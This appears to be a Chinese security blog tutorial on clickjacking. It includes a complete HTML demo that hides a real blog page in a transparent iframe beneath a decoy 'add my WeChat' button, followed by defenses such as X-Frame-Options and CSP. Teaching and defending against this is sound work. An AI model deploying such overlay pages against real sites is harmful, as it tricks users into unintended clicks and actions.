点击劫持(clickjacking)
目录
一. 漏洞描述
二. 点击劫持例子
三. 漏洞防御
一. 漏洞描述
点击劫持, clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由 互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。它是通过覆盖不可见的框架误导受害者点击。
虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。
这种攻击利用了HTML中<iframe>标签的透明属性。iframe标签是一个内联框架,说白了就是用来在当前 HTML 页面中嵌入另一个文档
就像一张图片上面铺了一层透明的纸一样,你看到的是黑客的页面,但是其实这个页面只是在底部,而你真正点击的是被黑客透明化的另一个网页。一个简单的点击劫持例子,就是当你点击了一个不明链接之后,自动访问别的链接去了。
二. 点击劫持例子
比如,我写的CSDN博客,某篇文章没啥热度,于是我想更多的人去点击这篇文章,于是我构造了一个页面clickjacking.html
<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>点击劫持 test</title>
<style>
iframe {
width: 1440px;
height: 900px;
position: absolute;
top: -0px;
left: -0px;
z-index: 2;
-moz-opacity: 0;
opacity: 0;
filter: alpha(opacity=0);
}
button {
position: absolute;
top: 245px;
left: 465px;
z-index: 1;
width: 90px;
height:40px;
}
</style>
</head>
<body>
<button>点击加我VX</button>
<img src="./girl.jpg">
<iframe src="https://blog.csdn.net/qq_44159028?spm=1011.2124.3001.5343" scrolling="no"></iframe>
</body>
</html>
访问如下,看到有一个美女点击可以加微信。那我就点咯~
然而这个页面只是表象而已,我们把iframe的透明度改成0.4以后再看看,修改opacity: 0.4;
我们这里点击加我vx,其实真正点击的是文字下面的那个链接,我们一点击就去访问该文章了。在你不知不觉中执行了别的操作
这是点击劫持的原理,我们可以结合xss、csrf进行攻击
三. 漏洞防御
服务端
1、使用认证码认证用户(验证码机制)
2、 X-FRAME-OPTIONS 机制
在微软发布新一代的浏览器Internet Explorer 8.0中首次提出全新的安全机制:X-FRAME-OPTIONS。该机制有两个选项:DENY 和 SAMEORIGIN。DENY表示任何网页都不能使用 iframe 载入该网页,SAMEORIGIN表示符合同源策略的网页可以使用 iframe载入该网页。如果浏览器使用了这个安全机制,在网站发现可疑行为时,会提示用户正在浏览 网页存在安全隐患,并建议用户在新窗口中打开。这样攻击者就无法通过 iframe 隐藏目标的网页。
客户端
- DENY:禁止iframe
- SAMEORIGIN:只允许相同域名下的网页iframe,同源政策保护
- Csp策略,限制frame标签的使用
- ALLOW-FROM: https://example.com:白名单限制
升级浏览器
最新版本的浏览器提供很多防御点击劫持漏洞的安全机制,对于普通的互联网用户,经常更新修复浏览器的安全漏洞,能够最有效的防止恶意攻击。
点击劫持(clickjacking)相关推荐
- 点击劫持ClickJacking
原文:https://beenle-xiaojie.github.io/2019/01/07/ClickJacking/ 引言 当我们的页面嵌入到一个iframe中时,安全测试提出一个于我而言很新鲜的 ...
- web 点击劫持 X-Frame-Options
原理解释 点击劫持,clickjacking,也被称为UI-覆盖攻击.这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的. 它是通过覆盖不可见的框架误导受害者点击. 虽 ...
- web安全之点击劫持攻击(clickjack)
点击劫持clickjack 点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段.攻击者使用一个或多个透明的 iframe ...
- html 设置响应X-frame,X-Frame-Options(点击劫持)漏洞分析及web配置修复
漏洞描述: 点击劫持(ClickJacking)是一种视觉上的欺骗手段.攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在网页上进行操作,此时用户将在不知情的情况下点击透明的ifram ...
- X-Frame-Options响应头防点击劫持
文章目录 前言 点击劫持 恶意转账 刷点击量 防护手段 HTTP响应头 实际防护效果 漏洞的检测 HTTP标题 X-XSS-Protection 前言 在一些漏扫设备中经常会扫出一个低风险问题--&q ...
- Web安全之点击劫持(ClickJacking)
目录 iframe覆盖 直接示例说明 解决办法 Apache配置: nginx配置: IIS配置: 图片覆盖 示例 解决办法 总结 点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两 ...
- Clickjacking (UI redressing)点击劫持
一.基础知识 1. 什么是Clickjacking 点击劫持是一种基于界面的攻击,通过点击诱骗网站中的其他内容,用户被诱骗实际点击了隐藏的可操作内容. 可能是电子邮件中的链接,引诱用户点击按钮即可赢得 ...
- 《白帽子讲web安全》第5章 点击劫持(ClickJacking)
一.ClickJacking简介 点击劫持(ClickJacking):是一种视觉上的欺骗手段,攻击者使用一个透明的.不可见的iframe覆盖在网页上,并诱使用户在该网页上进行操作.(用户在不知情的情 ...
- PortSwigger 点击劫持(Clickjacking)
一.什么是点击劫持 点击劫持(Clickjacking)是一种利用Web页面层叠的透明图层技术的攻击方式.攻击者将有害的网站内容覆盖在一个看似无害的页面上,当用户点击看似无害页面时,实际上是触发了隐藏 ...
- 鼠标自动点击脚本_613个主流网站中发现点击劫持脚本
香港中文大学.微软研究院.韩国首尔大学和宾夕法尼亚大学的研究人员对点击劫持进行了研究,发现有613个主流网站存在拦截用户点击的恶意脚本. Clickjacking即点击劫持,已经广泛应用于广告行业了, ...
最新文章
- wince下实现GPRS上网,程序控制拨号 .
- protobuf中 repeated[Ptr]Field的序列化
- 使用Spring Boot 2通过OAuth2和JWT进行集中授权
- Rocket - decode - 最小项与最大项
- 面向对象——抽象基类
- ElasticSearch + Logstash进行数据库同步
- bs4 乱码_python使用beautifulsoup乱码问题
- android开机自动启动app
- 2D武侠游戏《剑侠世界》网游单机 搭建教程说明
- Photoshop-RGB色彩模式
- C++17尝鲜:fold expression(折叠表达式)
- 用SDK包开发K66FX18学习笔记(4)
- 【总结】PHP常见面试题汇总(一)。。。
- ppt转换成pdf免费软件
- 影视短视频剪辑的完整操作流程(普通人也能学会)
- matlab如何在三维曲面上画线,如何在三维曲面上画线
- svg中 path标签的d属性
- 大数据深度学习学习路线
- Direct3D(D3D)简介
- 9个接私活的网站,你有码,我有钱
热门文章
- 各种炫酷的特效html代码,网页样式——各种炫酷效果及实现代码
- qt linux 程序设置字体,QT 程序更换字体方法之一
- flex:1 代表了什么意思
- 用友服务器换了ip地址怎么修改,用友服务器ip地址更换
- 用React实现基于Canvas的涂鸦画板
- 5-8 哈利·波特的考试
- 7-2 哈利·波特的考试 (25 分)(解释的挺详细了吧)
- JavaScript实现DoublyLinkedList双链表的算法(附完整源码)
- 升级mongodb时出现The data files need to be fully upgraded
- Java成员变量调用方法赋值问题